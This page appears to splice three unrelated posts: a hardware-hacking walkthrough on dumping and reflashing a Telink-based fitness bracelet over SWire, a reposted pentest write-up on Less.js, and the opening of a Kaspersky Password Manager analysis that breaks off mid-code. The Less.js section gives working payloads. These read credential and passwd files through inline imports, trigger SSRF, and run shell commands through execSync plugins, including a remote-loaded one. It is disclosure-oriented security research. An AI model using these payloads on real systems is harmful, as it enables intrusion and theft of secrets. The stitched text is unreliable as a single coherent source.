In Victor’s alternative programmer, the computer software is a Pascal, Windows-only application. I think it is a prime example of getting real stuff done with the language at hand.

The role of the computer software is to send commands to the programmer hardware and get it to read/write data from/to the target board. As I don’t have a Windows box at home, I implemented a barebones Python script, the tlsr82-debugger-client.py that works as the computer software component.

We can now use this Python script and the STM32 to hopefully speak SWire with our M6 bracelet. The setup is as follows:STM32 programmer + M6 setupThe STM32-based alternative programming setup

SWire Protocol Overview

Let’s take a dip into the mysterious SWire spec.

As the name suggests, a single wire is used for transmitting data back and forth between two devices. In our case, the STM32 programmer (the master) and the target board (the slave). There is no separate clock line as in SPI or I2C. The single wire topology allows for both devices to speak, but they cannot speak at the same time. In other words, we can call SWire an asynchronoushalf-duplex interface.

These two key aspects of SWire imply that:

  • Asynchronous: since there’s no shared clock, both devices must somehow employ compatible reading & writing speeds
  • Half duplex: each device must know when it should listen to messages and when it’s allowed to transmit messages. There must be a precisely choreographed dance between the two parties

To achieve coordination, the SWire protocol attributes responsibilities to the master and slave devices. The master is responsible for initiating the communication and managing the bus logic level between data transfers. The slave is responsible for sending data when it’s expected to. I put together some real-world examples below to make this clearer.

Sending a Single Bit

The first thing to notice is how bits are encoded in the wire. Each bit is transmitted in five units of time:

  • To send a 
    0
    , keep the voltage low for one unit and high for 
    4
     units;
  • To send a 
    1
    , keep the voltage low for 
    4
     units of time and high for 
    1
     unit;

To make matters concrete, here is a real SWire transmission I captured with a logic analyzer:SWire 0s and 1sExample of a 0 and a 1 in SWire

In the above screenshot, there are 8 bits being transmitted between the flags marked as 

25
 and 
26
. Can you decode these 8 bits? If you’re feeling brave, let me know your answer.

Sending a Single Byte

We now know how individual bits look in the wire. To transmit a full byte, the SWire protocol specifies that 9 bits are needed:

  • Bit 1: The cmd bit. 
    0
     specifies that the message contains data and 
    1
     specifies that the message is a command
  • Bits 2-8: The message content (8 bits)
  • One time unit of low level to signal the end of the message

Again, let’s take a look at a real-world example transmission of a 

0xb0
 byte:SWire byte transmissionExample of sending one byte in SWire

After the last unit of low is sent, the bus is released and goes back to it’s natural high voltage. In other words, the SWire data bus is pulled high.

Write Requests

We saw how individual bits and bytes are encoded in the wire. Next, let’s take a look at how the SWire protocol specifies a byte to be written at a specific address. In this scenario, the master wants to write a byte 

b
 to the address 
addr
 in the slave’s memory.

To do so, the master must send a sequence of bytes, each one encoded as described in the section above:

  1. The 
    START
     byte. This one always has the value 
    0x5a
  2. The most significant 8 bits of the target 
    addr
  3. The least significant 8 bits of the target 
    addr
  4. The 
    RW_ID
     byte. The most significant bit should be set 
    0
     for writing operations
  5. The byte value 
    b
  6. The 
    END
     byte. It always has the value 
    0xff

Let’s look at the following example:

SWire write request

Example of writing data in SWire

In this example, we can see the byte 

0x05
 being written into the slave’s memory address 
0x0602
.

Variations of the SWire Protocol

It’s worth noting that there exists at least one variation of the SWire protocol. In the other variant, the master sends 3 bytes of 

addr
 after the 
START
 byte, instead of only two bytes in our SWire protocol. The 3-byte variant is employed, for example, in Telink’s TLSR8251 SoCs, used in the Xiaomi thermometer we mentioned above. In the Python-based flasher in ATC_MiThermometer repository, we can see where the 3 bytes of 
addr
 are specified in the read/write requests from the master to the slave device.

Writing multiple bytes

That’s a lot of overhead for writing a single byte. Luckily, the protocol let’s us write multiple data bytes at once. To do so, the master simply sends a sequence of bytes instead of a single byte like in the example above.

Read Requests

Read requests are very similar to write requests. There are only two important differences:

  1. The most significant bit of the 
    RW_ID
     byte is set to 
    1
  2. Instead of sending data after the 
    RW_ID
     byte, the master reads data from the SWire data line

Again, take the following example. To make things more interesting, in this example the master reads two bytes from the slave:

Example of reading data in SWire

After sending the 

RW_ID
 byte, the master sends one unit of low level. The slave responds with 8 bits of data and one unit of low level. The master can request more data by writing a single unit of low level, otherwise the master sends the 
END
 byte (0xff) and the transmission is over.

Let’s zoom into the transmission of multiple bytes during the read request, just after the 

RW_ID
 byte above:

Zoom into the multi-byte read request

In this example, the master reads the value 

0x5316
 from the slave’s address 
0x007e
.

The address 

0x007e
 we just read is, in fact, a special register in the TLSR82xx chips. It holds the “Chip ID”. For our TLSR8232, the Chip ID is 
0x5316
.

You can find this whole annotated logic analyzer capture in get_soc_id.sal. It includes reads and writes requests.

Speed Mismatch Hazard

The above read example, we saw that both the master and slave read and write to the same bus. They must understand each other’s messages. A crucial setting is the speed at which both devices transmit data.

Let’s turn to the following pathological example. It is the same read request for address 

0x007e
 as above:

Example of speed mismatch between the master and slave

Take a look at what happens after the master sends it’s 

RW_ID
 byte. The slave starts responding, but with at a visibly lower speed. We can see that the bits are encoded in much wider windows than the previous ones sent from the master. Also note that, even though the whole transmission failed, the beginning of the slave’s response seems promising. It’s starts with 
0x16
, which is the expected first byte of the “Chip ID”.

This speed mismatch is a problem. It breaks the precise dance that the master has to coordinate. But not all is lost — from this observation we can draw two important conclusions — a bad one and a good one

  1. Bad one: To read data, the slave’s speed has to be compatible with the master’s speed, otherwise the master fails to coordinate the whole operation. I believe we could find a solution that adjusts this speed and gets the master to adapt its pace to the slave’s speed, but this is not currently done
  2. Good one: Writing data seems to be a less coordination-sensitive operation. As we noted above, the slave seems to have been able to correctly understand the bytes sent from the master (which spell “read request for address 
    0x007e
    ”), even though the slave itself is misconfigured with a slower speed

The last piece of the speed puzzle is that we can configure the slave’s speed by writing to one of its special registers. From the “missing SWire spec”, we see a little note about the register at the address 

0xb2
:

Slave’s SWire speed control register

In short, we can tune the slave’s SWire speed by writing to it’s 

0xb2
 memory address.

On the other end, we also need to set up the master’s SWire speed.

The strategy that has worked is to fix the master’s SWire speed at a reasonable value and try a few possible speeds for the slave. This is precisely what our Python script does (edited for brevity):


<em># Writes the value `speed` into the slave's 0x00b2 register.
</em><strong>def</strong> set_speed(speed):
    <strong>return</strong> write_and_read_data(make_write_request(0x00b2, &#91;speed]))

<strong>def</strong> find_suitable_sws_speed():
    <strong>for</strong> speed <strong>in</strong> range(2, 0x7f):
        set_speed(speed)
        <strong>try</strong>:
            get_soc_id()
        <strong>except</strong> Exception:
            <strong>continue</strong>
        <strong>else</strong>:
            <strong>print</strong>(f'Found and set suitable SWS speed: <strong>{</strong>speed<strong>}</strong>')
            <strong>return</strong> speed
    <strong>raise</strong> RuntimeError("Unable to find a suitable SPI speed")

<strong>def</strong> init_soc(sws_speed=None):
    ...
    <em># Set up the master speed.
</em>    set_pgm_speed(0x03)

    <em># If the user specifed a slave speed, use that.
</em>    <strong>if</strong> sws_speed <strong>is</strong> <strong>not</strong> None:
        set_speed(sws_speed)
    <em># Otherwise try many different ones until one works.
</em>    <strong>else</strong>:
        find_suitable_sws_speed()

Invalid CPU State Hazard

Another tricky trap is the fact that sometimes the slave’s CPU does not seem to respond to SWire requests. I haven’t found the precise reason, but my guess is that SWire doesn’t work when the slave is in some power saving mode or has interrupts disabled.

In practice, it means that it can be difficult to start a SWire exchange depending of the program that is running on the target device. To overcome this, pvvx’s strategy is to:

  • Reset the device (by pulling it’s RST pin low)
  • Start bombarding the target device with “CPU stop” SWire commands while the RST pin is pulled high

The objective here is to reach the CPU in a good state as it resets, before the application messes up with it too much.

Trick for stopping the CPU as early as possible

For the extra curious reader, the “CPU stop SWire command” is a simple write request of 

0x05
 to address 
0x0602
. This address corresponds to a special register that controls the CPU state.

Getting to the RST Pin

The RST trick above works really well. The only downside is that, if you look at the M6 board, the RST pin is not broken out in any pad.

Getting to the RST pin. Toothpick for scale

In the datasheet, we can see that the TLSR8232 RST is on pin 26. On the M6 board, this pin connects directly to a tiny capacitor, as shown in the photo above. This is a tricky soldering job, but it’s doable with a pre-tinned wire and a little bit of flux.

Alternative Tricks — No RST Soldering Required (Possibly)

While having the RST pin available makes life easier and working with SWire more predictable, it might not be strictly necessary. Two ideas to get around it:

  1. Just try it without the RST pin. You might find that it just works. In fact, if you look at how the Xiaomi thermometer alternative firmware is flashed, you will find out that the RST is not needed there
  2. As a last resort, you can try to manually power cycle the target board while the “CPU stop” bombardment is going on. You might try to tweak the code to increase this time window

Reading the SoC ID

With the content we covered so far, we are ready to take a look at a real-world scenario. Using the tlsr82-debugger-client.py Python script to read the target device’s memory:


% python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 get_soc_id
Trying speed 2
Trying speed 3
Trying speed 4
Trying speed 5
Trying speed 6
Trying speed 7
Found and set suitable SWS speed: 7
SOC ID: 0x5316

Behind the scenes, this invocation takes some of the steps we covered previously:

  1. Reset the target board by pulling RST low
  2. Bombard the target board by writing many “CPU stop” values to its CPU control register while RST is pulled high
  3. Set up the master’s SWire speed
  4. Iterate over possible SWire speeds for the target board until a suitable one is found
  5. Issue a 2-byte read request to address 
    0x007e

Reading and Writing to the Internal Flash Memory

One of our goals is to dump the target board’s firmware. It is stored in the board’s internal flash memory. While the details fo the SWire protocol are not public, Telink does offer a SDK for the TLSR8232 SoC. In there, there is an interesting file in 

ble_sdk_hawk/drivers/5316/flash.c
 that contains the code for the chip to read and write to its own internal flash — comments are my own:


_attribute_ram_code_ void flash_write_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  <em>// Writes value 6 to register 0x0d (spi control register).</em>
  flash_send_cmd(FLASH_WRITE_ENABLE_CMD);
  <em>// Writes value 2 to register 0x0d (spi control register).</em>
  flash_send_cmd(FLASH_WRITE_CMD);
  <em>// Writes 3 bytes of the target address to register 0x0c (spi data register).</em>
  flash_send_addr(addr);

  unsigned int i;
  <strong>for</strong>(i = 0; i &lt; len; ++i){
    <em>// Write data byte to register 0x0c (spi data register).</em>
    mspi_write(buf&#91;i]);
    mspi_wait();
  }
  <em>// Chip select high.</em>
  mspi_high();
  flash_wait_done();

  irq_restore(r);
}

_attribute_ram_code_ void flash_read_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  <em>// Writes value 3 to register 0x0d (spi control register).</em>
  flash_send_cmd(FLASH_READ_CMD);
  <em>// Writes 3 bytes of the target address to register 0x0c (spi data register).</em>
  flash_send_addr(addr);

  <em>// Dummy write to register 0x0c (spi data register).</em>
  mspi_write(0x00);
  mspi_wait();
  <em>// Writes value 0x0a to register 0x0d (spi control register).</em>
  mspi_ctrl_write(0x0a);
  mspi_wait();
  <em>/* get data */</em>
  <strong>for</strong>(int i = 0; i &lt; len; ++i){
    <em>// Reads byte from register 0x0c (spi data register).</em>
    *buf++ = mspi_get();
    mspi_wait();
  }
  <em>// Chip select high.</em>
  mspi_high();

  irq_restore(r);
}

We can see that interacting with the internal flash boils down to writing to the target board’s SPI control register (at address 0x0d) and reading/writing to the SPI data register (0x0c), as well as manipulating the SPI chip select logic level.

Since we know how to interact with the target board’s memory addresses via SWire, we can implement the exact same operations in our Python script, targetting reads and writes to the SPI control and data registers (

0x0d
 and 
0x0c
, respectively). This is exactly what I did. For instance, check out the 
write_flash
 function:


<strong>def</strong> write_flash(addr, data):
    send_flash_write_enable()

    <em># Chip select low.
</em>    write_and_read_data(make_write_request(0x0d, &#91;0x00]))

    <em># Write command.
</em>    write_and_read_data(make_write_request(0x0c, &#91;0x02]))

    <em># Flash address.
</em>    write_and_read_data(make_write_request(0x0c, &#91;(addr &gt;&gt; 16) &amp; 0xff]))
    write_and_read_data(make_write_request(0x0c, &#91;(addr &gt;&gt; 8) &amp; 0xff]))
    write_and_read_data(make_write_request(0x0c, &#91;addr &amp; 0xff]))

    <em># Write data
</em>    write_and_read_data(make_write_request(0x0c, data))

    <em># CNS high.
</em>    write_and_read_data(make_write_request(0x0d, &#91;0x01]))

The 

 function works similarly.

Dumping the Firmware

With the ability to read the target board’s internal flash over SWire, we can now dump the M6’s firmware:


$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 dump_flash flash.bin
Found and set suitable SWS speed: 7
Dumping flash to flash.bin...
CPU stop.
CSN high.
0x000000 00.00%
0x000100 00.05%
0x000200 00.10
...
0x07cd00 99.85%
0x07ce00 99.90%
0x07cf00 99.95%
Writing 512000 bytes to flash.bin

You can find the raw dump in the project’s repository, under dumped/flash.bin.

SDK, Compiler & Docker Image

With the first major goal of dumping the firmware behind us, we now turn to the challenge of running our own code on it. The first step is to get the SDK and compiler for the TLSR8232.

The SDK is available on Telink’s website. The one I used is listed in the “Bluetooth LE Generic” section. Unpacking the SDK reveals it’s integrated with Telink’s own IDE, which is based on the Eclipse IDE and seems to be only available for windows. This is fine, but I would love to make things easier creating a single Docker file with all the environment needed for compiling TLSR8232 programs.

Googling around brought me to the Ai-Thinker-Open/Telink_825X_SDK repository. It contains a SDK for Telink chips and it refers to a Linux tc32 toolchain, which is exactly what we need for running it under Docker. I used the tc32 toolchain and the TLSR8232 BLE SDK and set up a Dockerfile that makes compiling our custom code simpler.

With this, we can simply spin up a Docker container and type 

make
 to compile our code. We can build the blinky binary by doing:


<em># In the example-programs directory.</em>
<em># Build the Docker image from the Dockerfile.</em>
$ docker build <strong>-t</strong> tlsr8232 .

<em># Run the Docker containers and mount the current directory into /app.</em>
$ docker run <strong>-it</strong> <strong>--rm</strong> <strong>-v</strong> "<strong>${</strong>PWD<strong>}</strong>":/app tlsr8232

<em># Inside the docker container, compile the blinky example.</em>
$ cd blinky/
$ make
...

<em># The compiled binary file is in _build/blinky.bin.</em>
$ ls _build/blinky.bin
_build/blinky.bin

Blinky

The time has come. We now have all the tools and knowledge to compile and burn our own little firmware on the M6 bracelet. I hooked up a red LED to the TX pad and set out to make it blink.

The sample code for the blinky can be found in the GitHub repo under example-programs/blinky. Here is the entirety of its 

main()
 function:


int main() {
  cpu_wakeup_init();
  clock_init(SYS_CLK_16M_Crystal);
  gpio_init();

  <em>// TX pad.</em>
  gpio_set_func(GPIO_PB4, AS_GPIO);
  gpio_set_output_en(GPIO_PB4, 1);
  gpio_set_input_en(GPIO_PB4, 0);
  gpio_write(GPIO_PB4, 1);

  <strong>while</strong> (1) {
    gpio_toggle(GPIO_PB4);
    sleep_ms(500);
  }
  <strong>return</strong> 0;
}

As we did all the hard work of setting up the SDK & toolchain within our Docker image, compiling it is a breeze, as we saw in the previous section. We just have to use our Docker file, mount the 

example-programs/
 repository directory into 
/app
 and type 
make
 on the example we want to build:


root@c54c8204641d:/app/blinky# make
mkdir <strong>-p</strong> _build/drivers
...
/opt/tc32/bin/tc32-elf-gcc <strong>-c</strong> <strong>-Wall</strong> <strong>-std</strong>=gnu99 <strong>-DMCU_STARTUP_5316</strong> <strong>-I</strong> /opt/8232_BLE_SDK/ble_sdk_hawk/ <strong>-ffunction-sections</strong> <strong>-fdata-sections</strong> <strong>-o</strong> _build/main.o main.c
/opt/tc32/bin/tc32-elf-ld <strong>--gc-sections</strong> <strong>-T</strong> /opt/8232_BLE_SDK/ble_sdk_hawk/boot.link <strong>-o</strong> _build/blinky _build/main.o _build/drivers/gpio.o _build/drivers/analog.o _build/drivers/clock.o _build/drivers/bsp.o _build/drivers/adc.o _build/asm/cstartup_5316.o /opt/8232_BLE_SDK/ble_sdk_hawk/proj_lib/liblt_5316.a
/opt/tc32/bin/tc32-elf-objcopy <strong>-O</strong> binary _build/blinky _build/blinky.bin

Burning the compiled firmware in the M6 board is done with our trusty Python script:


$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 write_flash ../example-programs/blinky/_build/blinky.bin
Found and set suitable SWS speed: 7
Erasing flash...
Flash status: 03
Flash status: 00
Writing flash from ../example-programs/blinky/_build/blinky.bin...
0x0000 00.00%
0x0100 03.35%
0x0200 06.71%
...
0x1c00 93.92%
0x1d00 97.27%
Flash status: 00

Immediately after the command finishes, the M6 board should do its thing:

A love letter to the «yOu ShOuLd HaVe uSeD a 555» gang

The Capacitive Button

The touch pad in the M6 is not connected directly to the TLSR SoC, but instead passes through a driver IC on the board. I suspect the IC is responsible for managing the touch-sensing circuitry and piping a clean digital signal to the SoC, but I couldn’t easily identify the mysterious IC.

To figure out the corresponding SoC button pin, I used a binary search approach. I first identified all GPIO pins that hadn’t been used yet and set them all up as inputs. I then iterated over them and checked whether or not any of them changed state as I touched the button. If that happened, I toggled the LED. I then partitioned the GPIO pins under test in two groups and repeated the process for that group. It’s not very elegant but I got to the actual pin in no time.

It turns our the button state can be read from the 

GPIO_PC2
 pin. Here’s the result of running example-programs/button firmware:

Touching the capacitive button turns the LED off

Display

The next goal is to draw something on the display. The first task to identify the hardware. After a lot of googling and guessing, I found the exact same display on AliExpress.

It is a 13-pin, 160×80 px, color SPI TFT display. It’s a little weird that the data lines are called SDA and SCL (which are often seen in I²C devices). I believe they are, in fact, the MOSI and SCLK in disguise.Display pinsOverlaid pin labels on the display connector

It uses the ST7735 driver (PDF) to push pixels to the screen. This is good news, as this driver is relatively popular among color displays. It’s featured in many maker-friendly products and supported by Adafruit’s ST7735 library. While Adafruit’s library is built on top of Arduino abstractions and we’re very far from that, it proved to be a great reference.

Next, again, the task is to figure out to which SoC pins the display are connected. Long story short:

Display pinSoC Pin #SoC Pin LabelFunction
SDA29SWS/ANA_C<3>SPI data
SCL31ANA_C<5>SPI clock
RS32ANA_C<6>Data/command selector (D/C# in the ST7732 datasheet)
CS03ANA_A<1>SPI chip select, active low
RST02ANA_A<0>Reset pin, active low
LEDK04ANA_A<2>TFT backlight diode cathode; Driven through a NPN transistor

To draw a single pixel on the display, we need to take the following actions:

  1. Turn on the display’s backlight by driving it’s LED cathode (LEDK pin)
  2. Pull RST high
  3. Set up SPI with pins SDA & SCL on the target board
  4. Send a bunch of commands to the ST7735 driver. These include:
    1. Get out of sleep mode
    2. Set up the color format (here I’m using RGB565, with 16 bits per pixel)
    3. Set up the display’s physical dimentions
    4. Turn the display on
  5. Send a command to define the drawing region
  6. Send 16 bits of color for a single pixel

Getting all the details right was not an easy task. Most of the time it feels like working with a black box — there’s no feedback and the error could be anywhere, from the display identification to the pin mapping to the program logic to firmware burning errors.Using all the tools in the toolboxWhich tools did I use? Yes.

In the end, through blood, sweat and tears, it finally worked. The example-programs/display draws some color squares in the middle of the screen:

Display squares
Display pins

Drawing Text

Given we know how to draw individual pixels on the display, drawing text boils down to figuring out which pixels should be drawn for each character.

bitmap font fits the bill perfectly. In those, each character is just an array of bits, in which a 

0
 represents background and 
1
 represents the pixels we need to draw.

Let’s borrow the Picopixel bitmap font from the Adafruit GFX library.

As an example, if we dig a little bit, we find that the letter 

A
 is 3 pixels wide x 5 pixels high and is encoded in the two bytes 
0x57 0xda
. We start by unrolling those bytes into their binary representation:

0x57 0xda
 => 
0101011111011010

We know this particular character is 3 pixels wide, so we lay that bit sequence into rows, 3 bits at a time:


010
101
111
101
101

And just like magic, if we paint the 

1
 bits, we see the letter 
'A'
 come up:


 #
# #
###
# #
# #

I implemented this idea in example-programs/text. It’s nice to notice that this algorithm generalizes well for scaling up text. We can target groups of 2×2, 3×3 or 4×4 pixels as if they were one single superpixel.

A dramatic example of text drawing

Bluetooth Low Energy — Peripheral Role

To get started with BLE, I set up the TLSR8232 in peripheral mode and defined a BLE characteristic that toggles an LED when it’s written to. In example-programs/ble-services, I hooked an LED to the TX pad:

Bluetooth Low Energy Blinky

In the previous video, I’m using the nRF connect iOS app to connect to the M6 board and interact with the BLE services I defined in the firmware.

Bluetooth Low Energy — Central Role

For the grand finale, I set up to use the M6 as a BLE tracker for another project on mine — the b-parasite soil moisture/air temperature and humidity sensor.

The b-parasite broadcasts its sensor readings via BLE advertisement packets. I thought it would make an interesting demo if I could capture those broadcasts with the M6 and print the sensor values on its display.

As we know the MAC address of b-parasites, we can filter the relevant advertisements with it. Once we identify a b-parasite advertisement, we look into its raw bytes to decode the sensor values:


<em>// BLE advertisement callback. Called whenever a new advertisement</em>
<em>// packet comes in.</em>
int hci_event_handle(u32 h, u8 *param, int n) {
  ...
  event_adv_report_t *p = (event_adv_report_t *)param;
  ...
  <em>// Is this a b-parasite advertisement?</em>
  <strong>if</strong> (p-&gt;mac&#91;5] == 0xf0 &amp;&amp; p-&gt;mac&#91;4] == 0xca &amp;&amp; p-&gt;mac&#91;3] == 0xf0 &amp;&amp;
      p-&gt;mac&#91;2] == 0xca &amp;&amp; p-&gt;mac&#91;1] == 0x00 &amp;&amp; p-&gt;mac&#91;0] == 0x08) {
    ...
    <em>// Decode sensor values from the advertisement payload.</em>
    b_parasite_adv_t bp_data;
    bp_data.counter = p-&gt;data&#91;8];
    bp_data.battery_millivoltage = p-&gt;data&#91;9] &lt;&lt; 8 | p-&gt;data&#91;10];
    bp_data.temp_millicelcius = p-&gt;data&#91;11] &lt;&lt; 8 | p-&gt;data&#91;12];
    bp_data.air_humidity = p-&gt;data&#91;13] &lt;&lt; 8 | p-&gt;data&#91;14];
    bp_data.soil_moisture = p-&gt;data&#91;15] &lt;&lt; 8 | p-&gt;data&#91;16];

    <em>// Draw values on the display.</em>
    draw_parasite_data(&amp;bp_data);
    ...
}

The full code for the demo is in example-programs/ble-b-parasite-tracker. Here’s the result:

Bluetooth Low Energy & b-parasite

Final Words

If you made it this far, thanks for reading. I hope you enjoyed it. As much as it is a lot of fun, writing posts like this takes a lot of time and effort. If you want to show your support, consider following me on Twitter.

EXPLOITING LESS.JS TO ACHIEVE RCE

EXPLOITING LESS.JS TO ACHIEVE RCE

Original text by Jeremy Buis

Introduction

Less (less.js) is a preprocessor language that transpiles to valid CSS code. It offers functionality to help ease the writing of CSS for websites. 

According to StateofCss.org in their 2020 survey, Less.js was the second most popular preprocessor in terms of usage.

State of CSS - Less.js in ranking of usage
Less popularity sorted by usage in 2020

While performing a pentest for one of our Penetration Testing as a Service (PTaaS) clients, we found an application feature that enabled users to create visualizations which allowed custom styling. One of the visualizations allowed users to input valid Less code, which was transpiled on the client-side to CSS. 

This looked like a place that needed a closer look. 

Less has some interesting features, especially from a security perspective. Less before version 3.0.0 allows the inclusion of JavaScript by default with the use of the backtick operators. The following is considered valid Less code:


@bodyColor: `red`;
body {
  color: @bodyColor;
}

Copy

Which will output:


body {
  color: red;
}

Copy

Inline JavaScript evaluation was documented back in 2014 and can be seen here near the header “JavaScript Evaluation”.

JavaScript Evaluation

Standing on the shoulders of giants

RedTeam Pentesting documented the inline JavaScript backtick behaviour as a security risk in an advisory that was released in 2016.  They warned that it could lead to RCE in certain circumstances. The following is a working proof-of-concept from their excellent blog post:


$ cat cmd.less
@cmd: `global.process.mainModule.require("child_process").execSync("id")`;
.redteam { cmd: "@{cmd}" }

Copy

As a result, Less versions 3.0.0 and newer disallow inline JavaScript via backticks by default and can be reenabled via the option 

{javascriptEnabled: true}
.

Next, we return to our PTaaS client test, where the Less version was pre 3.0.0 and transpiled on the client-side, which allowed inline JavaScript execution by default. This resulted in a nice DOM-based stored cross-site scripting vulnerability with a payload like the following:


body {
color: `alert('xss')`;
}

Copy

The above pops an alert that notifies the XSS payload was successful once the Less code is transpiled.

This was a great find for our client, but wasn’t enough to scratch our itch. We started probing the rest of the available features to see if there was any other dangerous behaviour that could be exploited.

The bugs

Import (inline) Syntax

The first bug is a result of the enhanced import feature of Less.js, which contains an inline mode that doesn’t interpret the requested content. This can be used to request local or remote text content and return it in the resulting CSS. 

In addition, the Less processor accepts URLs and local file references in its @import statements without restriction. This can be used for SSRF and local file disclosure when the Less code is processed on the server-side. The following steps first demonstrate a potential local file disclosure followed by a SSRF vulnerability.

Local file disclosure PoC

1. Create a Less file like the following:


// File: bad.less
@import (inline) "../../.aws/credentials";

Copy

2. Launch the lessc command against your less file


Less $ lessc bad.less

Copy

3. Notice the output contains the referenced file


Lessjs $ .\node_modules\.bin\lessc .\bad.less
&#91;default]
  aws_access_key_id=&#91;MASKED]
  aws_secret_access_key=&#91;MASKED]

Copy

SSRF PoC

1. Start a web server on localhost serving a Hello World message

2. Create a Less file like the following:


// File: bad.less
@import (inline) "http://localhost/";

Copy3. Launch the 

lessc
 command against your less file and notice the output contains the referenced external content


Lessjs $ .\node_modules\.bin\lessc .\bad.less
Hello World

Copy

Plugins

The Less.js library supports plugins which can be included directly in the Less code from a remote source using the @plugin syntax. Plugins are written in JavaScript and when the Less code is interpreted, any included plugins will execute. This can lead to two outcomes depending on the context of the Less processor. If the Less code is processed on the client side, it leads to cross-site scripting. If the Less code is processed on the server-side, it leads to remote code execution. All versions of Less that support the @plugin syntax are vulnerable.

The following two snippets show example Less.js plugins.

Version 2:


// plugin-2.7.js
functions.add('cmd', function(val) {
  return val;
});

Copy

Version 3 and up:


// plugin-3.11.js
module.exports = {
  install: function(less, pluginManager, functions) {
    functions.add('ident', function(val) {
      return val;
    });
  }
};

Copy

Both of these can be included in the Less code in the following way and can even be fetched from a remote host:


// example local plugin usage
@plugin "plugin-2.7.js";

Copy

or


// example remote plugin usage
@plugin "http://example.com/plugin-2.7.js"

Copy

The following example snippet shows how an XSS attack could be carried out:


window.alert('xss')
functions.add('cmd', function(val) {
  return val;
});

Copy

Plugins become even more severe when transpiled on the server-side. The first two examples show version 2.7.3

The following plugin snippet (v2.7.3) shows how an attacker might achieve remote code execution (RCE):


functions.add('cmd', function(val) {
  return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`;
});

Copy

And the malicious less that includes the plugin:


@plugin "plugin.js";

body {
color: cmd('whoami');
}

CopyNotice the output when the less code is transpiled  using 

lessc
.

Lessjs Local RCE

The following is the equivalent PoC plugin for version 3.13.1:


//Vulnerable plugin (3.13.1)
registerPlugin({
    install: function(less, pluginManager, functions) {
        functions.add('cmd', function(val) {
            return global.process.mainModule.require('child_process').execSync(val.value).toString();
        });
    }
})

Copy

The malicious Less code is the same for all versions. All version of Lessjs that support plugins can be exploited using one of the PoCs from above.

Real-world example: CodePen.io

CodePen.io is a popular website for creating web code snippets, and supports the standard languages plus others like Less.js. Since CodePen.io accepts security issues from the community, we tried our above proof of concepts to check the results of our research.

As a result, we found that it was possible to perform the above attack using plugins against their website. We were able to leak their AWS secret keys and run arbitrary commands inside their AWS Lambdas.

The following shows reading environment values using the local file inclusion bug.


// import local file PoC
import (inline) "/etc/passwd";

Copy


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...snip...
ec2-user:x:1000:1000:EC2 Default User:/home/ec2-user:/bin/bash
rngd:x:996:994:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin
slicer:x:995:992::/tmp:/sbin/nologin
sb_logger:x:994:991::/tmp:/sbin/nologin
sbx_user1051:x:993:990::/home/sbx_user1051:/sbin/nologin
sbx_user1052:x:992:989::/home/sbx_user1052:/sbin/nologin
...snip...

Copy

The next screenshot shows using the Less plugin feature to gain RCE.

less-plugin-rce
Less RCE PoC in action

We responsibly disclosed the issue and CodePen.io quickly fixed the issue.

References

  1. http://web.archive.org/web/20140202171923/http://www.lesscss.org/
  2. Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler
  3. Executing JavaScript In The LESS CSS Precompiler
  4. Features In-Depth | Less.js

Kaspersky Password Manager: All your passwords are belong to us

Kaspersky Password Manager: All your passwords are belong to us

Original text by Jean-Baptiste Bédrune

tl;dr: The password generator included in Kaspersky Password Manager had several problems. The most critical one is that it used a PRNG not suited for cryptographic purposes. Its single source of entropy was the current time. All the passwords it created could be bruteforced in seconds. This article explains how to securely generate passwords, why Kaspersky Password Manager failed, and how to exploit this flaw. It also provides a proof of concept to test if your version is vulnerable.

The product has been updated and its newest versions aren’t affected by this issue.

Introduction

Two years ago, we looked at Kaspersky Password Manager (KPM), a password manager developed by Kaspersky. Kaspersky Password Manager is a product that securely stores passwords and documents into an encrypted vault, protected by a password. This vault is protected with a master password, so, as with other password managers, users have to remember a single password to use and manage all their passwords. Product is available for various operating systems (Windows, macOS, Android, iOS, Web…) Encrypted data can then be automatically synchronized between all your devices, always protected by your master password.

The main functionality of KPM is password management. One key point with password managers is that, contrary to humans, these tools are good to generate random, strong passwords. To generate secure passwords, Kaspersky Password Manager must rely on a secure password generation mechanism. We will first see an example of a good password generation method, to explain after why the method used by Kaspersky was flawed, and how we exploited it. As we will see, passwords generated by this tool can be bruteforced in seconds.

After a bit less than two years, this vulnerability has been patched on all versions of KPM. Vulnerability has been assigned CVE-2020-27020.

Generating robust passwords from a charset

For the sake of simplicity, let’s study how passwords are generated in KeePass, an open source project. Password generation is implemented in various classes in the 

KeePassLib.Cryptography.PasswordGenerator
 namespace. KeePass provides 3 methods to generate a password: a charset-based, a pattern-based and a custom generation method.

The simpler method is the charset-base generator, which creates a password from a given charset. Let see how it works. Here is the main loop responsible for the password generation:


PwCharSet pcs = <strong>new</strong> <strong>PwCharSet</strong>(pwProfile.CharSet.<strong>ToString</strong>());
<strong>if</strong>(!PwGenerator.<strong>PrepareCharSet</strong>(pcs, pwProfile))
    <strong>return</strong> PwgError.InvalidCharSet;

<strong>char</strong>&#91;] v = <strong>new</strong> <strong>char</strong>&#91;pwProfile.Length];
<strong>try</strong>
{
    <strong>for</strong>(<strong>int</strong> i = 0; i &lt; v.Length; ++i)
    {
        <strong>char</strong> ch = PwGenerator.<strong>GenerateCharacter</strong>(pcs, crsRandomSource);
        <strong>if</strong>(ch == <strong>char</strong>.MinValue)
            <strong>return</strong> PwgError.TooFewCharacters;

        v&#91;i] = ch;
        <strong>if</strong>(pwProfile.NoRepeatingCharacters) pcs.<strong>Remove</strong>(ch);
    }
    ...
}

The 

GenerateCharacter
 method is called to generate every single character from the password. It takes a charset and a random source, and outputs a random character from the charset. Its implementation is rather straightforward:


<strong>internal</strong> <strong>static</strong> <strong>char</strong> <strong>GenerateCharacter</strong>(PwCharSet pwCharSet,
                                       CryptoRandomStream crsRandomSource)
{
    <strong>uint</strong> cc = pwCharSet.Size;
    <strong>if</strong>(cc == 0) <strong>return</strong> <strong>char</strong>.MinValue;

    <strong>uint</strong> i = (<strong>uint</strong>)crsRandomSource.<strong>GetRandomUInt64</strong>(cc);
    <strong>return</strong> pwCharSet&#91;i];
}

